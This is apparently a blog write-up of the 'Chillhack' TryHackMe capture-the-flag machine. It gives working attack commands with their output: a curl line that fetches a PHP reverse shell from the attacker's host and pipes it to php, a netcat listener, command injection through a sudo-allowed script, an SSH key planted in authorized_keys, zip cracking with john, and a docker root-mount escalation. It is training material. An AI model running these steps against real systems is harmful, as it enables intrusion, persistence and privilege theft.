Chillhack

Dec 4, 2020 cracking ssh port forward steganography docker
Share on:

Overview

Chillhack

Overview: This machine started out great but I did not enjoy this much since it did not fit my need at the moment to train for a certification. This is a great machine with wide variety of exposure and you will definitely enjoy.

Anyway, not spending too much energy on this write up, but here is a quick run for you -

Directory scan will reveal a “secret” directory and it leads you to a webpage that can execute shells. You can now host the reverse shell php on your attack machine and run it directly from the page.

1ell/
2eneloop@kinetic:/oscp/tools/reverse-shell$ ls
3php-reverse-shell.php  shell.php
4eneloop@kinetic:/oscp/tools/reverse-shell$ python3 -m http.server
5Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
610.10.121.174 - - [05/Dec/2020 09:12:03] "GET /shell.php HTTP/1.1" 200 -

1# nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.52.230] 53744
4Linux ubuntu 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
5 03:39:11 up 49 min,  0 users,  load average: 0.00, 0.00, 0.00
6USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
7uid=33(www-data) gid=33(www-data) groups=33(www-data)
8/bin/sh: 0: can't access tty; job control turned off
9$ 

1curl http://10.6.19.215:8000/shell.php | p\hp

Once you catch the shell, it will lead you to script that you are allowed to run (sudo -l) as apaar user who seems to have a mysterious local.txt on this machine.

 1$ sudo -u apaar /home/apaar/.helpline.sh
 2
 3Welcome to helpdesk. Feel free to talk to anyone at any time!
 4
 5
 6asasa
 7Thank you for your precious time!
 8$ bash
 9
10whoami     
11www-data
12
13
14python -c 'import pty; pty.spawn("/bin/bash");'
15bash: line 5: python: command not found
16
17which python
18python3 -c  'import pty; pty.spawn("/bin/bash");'
19
20
21www-data@ubuntu:/home/apaar$ sudo -u apaar /home/apaar/.helpline.sh
22sudo -u apaar /home/apaar/.helpline.sh
23
24Welcome to helpdesk. Feel free to talk to anyone at any time!
25
26Enter the person whom you want to talk with: santa
27santa
28Hello user! I am santa,  Please enter your message: bash -i
29bash -i
30whoami
31apaar
32ls -
33ls -l
34total 4
35-rw-rw---- 1 apaar apaar 46 Oct  4 07:25 local.txt
36cat local.txt
37{USER-FLAG: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
38

So, the local.txt ended up being the first user flag.

 1cd .ssh
 2ls
 3authorized_keys
 4echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfiK99/NWavu+zHyLtp5qatCXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXf1LeMvJNke7I53+VR8qOYzkKlzJl1Q3Y1/72B5CBJFULnB6vSiCpxEywML1Nj2/0g84F/XR75pJkmD2BkWnxQabsVp2ja4CzhpLtZCWXEGimz3Kxg1Z6mM9a3Bf1lrASPS9q55Oahoym3eIAAbQHip8fjnkrwhH8sQpNqsBuiKVYwezMVcVUPw5ipwM= XXX@XXXX" >> authorized_keys
 5
 6
 7
 8
 9cat authorized_keys
10ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3BzOCWTm3aFsN/RKd4n4tBT71A+vJYONyyrDDj59Pv8lnVTtxi1/VI2Nb/op1nHUcuz1tYMJDMew2kkb+5CX6uiYfnryzD4OQoQUhC4tMSmopIoAi322Y5QSzSY1mSBESddCsn0C5VgE9in4PFl3rFv/k05hJDTXewmCh06vN7OAT5CLbf9lTtf1/Ga40pRixYFlV5owqZci697h17Is1K7RSFCQZwLGl29pLHPBwOpXkHpJqNqEl6Wgu+y0jvauNKzgIypD0EyojgX+1OPogSEr8WNuOc8w6wqQm6gTaAayPioIATTD/ECDBMJPLYN71t6Wdi5E+7R2GT6BIRFiGhTG65KXwXj6Vn7bj99BLSlaq2Qk6oUYpxhhkaE5koPKCJHb9zBsrGEUHTOMFjKhCypQCtjG9noW2jzm+/beqKcEZINQEQfzQFIGKdH0ypGfCCvD6YFUg7lcqQQH5Zd+9a95/5WyUE0XkNzJzU/yxfQ8RDB2In/ZptDYNBFoHXfM= root@ubuntu
11ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfiK99/NWavu+zHyLtp5qatCBpZQhJfzvCtBO2IvLLjZUDnJ8anN1cY0N2to4m82Mcze5U/8g66Ox1V2+H77Qbf08xD3ulg58U8VeFmMVTvuFQjTq1ee73+aphNX1zzzgO8xgXrmZ6pltIxtmnVJu9eDI61/zHwTg7irOqaYP3TH1VWZRULRhExHhCWwlwH2O4L8FzJ1bTvd+Uf1lBgI9jyK6CCl5w0lVJJRiQtyOTdg0K9LhYebNgXJskqOwrQr91hA3Z/N4XwNeMszACh3ImFdvPQ1MEGhMYZfMrOyiDOlD5va2NTomnoc8rJuWybrWeQSCof1LeMvJNke7I53+VR8qOYzkKlzJl1Q3Y1/72B5CBJFULnB6vSiCpxEywML1Nj2/0g84F/XR75pJkmD2BkWnxQabsVp2ja4CzhpLtZCWXEGimz3Kxg1Z6mM9a3Bf1lrASPS9q55Oahoym3eIAAbQHip8fjnkrwhH8sQpNqsBuiKVYwezMVcVUPw5ipwM= eneloop@kinetic
12
13

 1eneloop@kinetic:~/.ssh$ cat id_rsa.pub 
 2ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfiK99/NWavu+zHyLtp5qatCBpZQhJfzvCtBO2IvLLjZUDnJ8anN1cY0N2to4m82Mcze5U/8g66Ox1V2+H77Qbf08xD3ulg58U8VeFmMVTvuFQjTq1ee73+aphNX1zzzgO8xgXrmZ6pltIxtmnVJu9eDI61/zHwTg7irOqaYP3TH1VWZRULRhExHhCWwlwH2O4L8FzJ1bTvd+Uf1lBgI9jyK6CCl5w0lVJJRiQtyOTdg0K9LhYebNgXJskqOwrQr91hA3Z/N4XwNeMszACh3ImFdvPQ1MEGhMYZfMrOyiDOlD5va2NTomnoc8rJuWybrWeQSCof1LeMvJNke7I53+VR8qOYzkKlzJl1Q3Y1/72B5CBJFULnB6vSiCpxEywML1Nj2/0g84F/XR75pJkmD2BkWnxQabsVp2ja4CzhpLtZCWXEGimz3Kxg1Z6mM9a3Bf1lrASPS9q55Oahoym3eIAAbQHip8fjnkrwhH8sQpNqsBuiKVYwezMVcVUPw5ipwM= eneloop@kinetic
 3eneloop@kinetic:~/.ssh$ ssh [email protected]
 4The authenticity of host '10.10.165.65 (10.10.165.65)' can't be established.
 5ECDSA key fingerprint is SHA256:ybdflPQMn6OfMBIxgwN4h00kin8TEPN7r8NYtmsx3c8.
 6Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
 7Warning: Permanently added '10.10.165.65' (ECDSA) to the list of known hosts.
 8Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)
 9
10 * Documentation:  https://help.ubuntu.com
11 * Management:     https://landscape.canonical.com
12 * Support:        https://ubuntu.com/advantage
13
14  System information as of Sat Dec  5 01:15:27 UTC 2020
15
16  System load:  0.08               Processes:              119
17  Usage of /:   24.8% of 18.57GB   Users logged in:        0
18  Memory usage: 20%                IP address for eth0:    10.10.165.65
19  Swap usage:   0%                 IP address for docker0: 172.17.0.1
20
21  => There is 1 zombie process.
22
23
24 * Canonical Livepatch is available for installation.
25   - Reduce system reboots and improve kernel security. Activate at:
26     https://ubuntu.com/livepatch
27
2819 packages can be updated.
290 updates are security updates.
30
31
32Last login: Sun Oct  4 14:05:57 2020 from 192.168.184.129
33apaar@ubuntu:~$ 
34

1ssh -fNL 0.0.0.0:3000:localhost:9001 [email protected]
2

 1root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# ls -otr
 2total 2296
 3-rwxrwx--- 1 root    7273 Dec  3 21:51 chillhack-thumb.png
 4-rwxrwx--- 1 root   20837 Dec  3 21:51 box_header.png
 5-rwxrwx--- 1 root    2450 Dec  3 21:53 chillhack.nmap.txt
 6-rwxrwx--- 1 root      90 Dec  3 21:55 note.txt
 7-rwxrwx--- 1 root   25329 Dec  3 22:01 secret.png
 8-rwxrwx--- 1 root   30639 Dec  3 22:05 areyouhacker.png
 9-rwxrwx--- 1 root   14711 Dec  3 22:06 try-commands.png
10-rwxrwx--- 1 root   69309 Dec  4 19:25 hacker-source.png
11-rwxrwx--- 1 root 2083694 Dec  5 09:21 002d7e638fb463fb7a266f5ffc7ac47d.gif
12-rwxrwx--- 1 root   68841 Dec  5 09:25 hacker-with-laptop_23-2147985341.jpg
13-rwxrwx--- 1 root     750 Dec  5 09:25 backup.zip
14-rwxrwx--- 1 root    1239 Dec  5 09:30 myfile.php
15root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# john --format=zip ./myfile.php 
16
17
18root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# john file.txt --wordlist=/usr/share/wordlists/rockyou.txt
19Using default input encoding: UTF-8
20Loaded 1 password hash (PKZIP [32/64])
21Will run 2 OpenMP threads
22Press 'q' or Ctrl-C to abort, almost any other key for status
23pass1word        (backup.zip/source_code.php)
241g 0:00:00:00 DONE (2020-12-05 09:35) 50.00g/s 614400p/s 614400c/s 614400C/s total90..hawkeye
25Use the "--show" option to display all of the cracked passwords reliably
26Session completed
27root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# unzip backup.zip 
28Archive:  backup.zip
29[backup.zip] source_code.php password: 
30  inflating: source_code.php  

 1<?php
 2        if(isset($_POST['submit']))
 3	{
 4		$email = $_POST["email"];
 5		$password = $_POST["password"];
 6		if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
 7		{ 
 8			$random = rand(1000,9999);?><br><br><br>
 9			<form method="POST">
10				Enter the OTP: <input type="number" name="otp">
11				<input type="submit" name="submitOtp" value="Submit">
12			</form>
13		<?php	mail($email,"OTP for authentication",$random);
14

1# echo "IWQwbnRLbjB3bVlwQHXXXXXXXXX==" | base64 -d
2XXXXXXXXXXX
3

1Last login: Sun Oct  4 14:05:57 2020 from 192.168.184.129
2apaar@ubuntu:~$ su anurodh
3Password: 
4anurodh@ubuntu:/home/apaar$ ls -l

 1anurodh@ubuntu:~$ id
 2uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
 3anurodh@ubuntu:~$ 
 4anurodh@ubuntu:~$ docker ps
 5CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
 6anurodh@ubuntu:~$ ps -ef | grep docker
 7root      1261     1  0 14:10 ?        00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
 8anurodh   2210  2097  0 14:42 pts/1    00:00:00 grep --color=auto docker
 9anurodh@ubuntu:~$ which docker
10/usr/bin/docker
11anurodh@ubuntu:~$ ls -l /usr/bin/docker
12-rwxr-xr-x 1 root root 84982272 Sep 16 17:01 /usr/bin/docker
13anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
14# whoami
15root
16# ls
17bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run	sbin  snap  srv  swap.img  sys	tmp  usr  var  vmlinuz	vmlinuz.old
18# cd /root
19# ls
20proof.txt
21

The proof.txt has the root flag.